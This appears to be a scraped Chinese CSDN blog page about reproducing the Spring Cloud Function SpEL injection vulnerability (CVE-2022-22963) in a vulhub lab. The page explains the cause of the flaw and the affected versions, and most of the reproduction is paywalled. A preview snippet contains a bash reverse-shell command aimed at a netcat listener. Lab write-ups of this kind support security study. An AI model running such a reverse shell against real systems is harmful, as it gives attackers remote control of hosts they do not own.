Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)

imz丶

已于 2022-04-25 21:37:50 修改

阅读量3.7k

点赞数

分类专栏：漏洞复现文章标签：安全 java web安全

于 2022-04-25 20:07:30 首次发布

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/yang1234567898/article/details/124412945

版权

Spring Cloud Function 提供了一种通用模型，用于在各种平台上部署基于函数的软件，包括 Amazon AWS Lambda 等 FaaS（函数即服务）平台。

漏洞简介：

简单说一下这个漏洞产生的原因，

在/functionRouter的POST请求头中添加一个spring.cloud.function.routing-expression参数，Spring Cloud Function会直接将参数值带入SpEL中查询导致SpEL注入。

如下面的请求

最终程序会判断请求的字段中是否有spring.cloud.function.routing-expression参数，如果有，就会将该参数的值通过带入到SpEL表达式中别执行。

具体原理在这就不细究了

可参考下面文章

Java漏洞分析-Spring Cloud Function SPEL表达式注入漏洞分析_senior_artist的博客-CSDN博客

影响范围：

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

漏洞复现

启动vulhub靶场环境，出现下面的页面说明

最低0.47元/天解锁文章

关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)

漏洞复现启动vulhub靶场环境，出现下面的页面说明启动成功首先，先用nc监听1234端口需要将反弹shell的命令进行编码bash -i >& /dev/tcp/192.168.96.1/1234 0>&1编码脚本如下，直接复制改后缀名为.html打开即可<!DOCTYPE html><html><head> <title>java runtime exe...
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。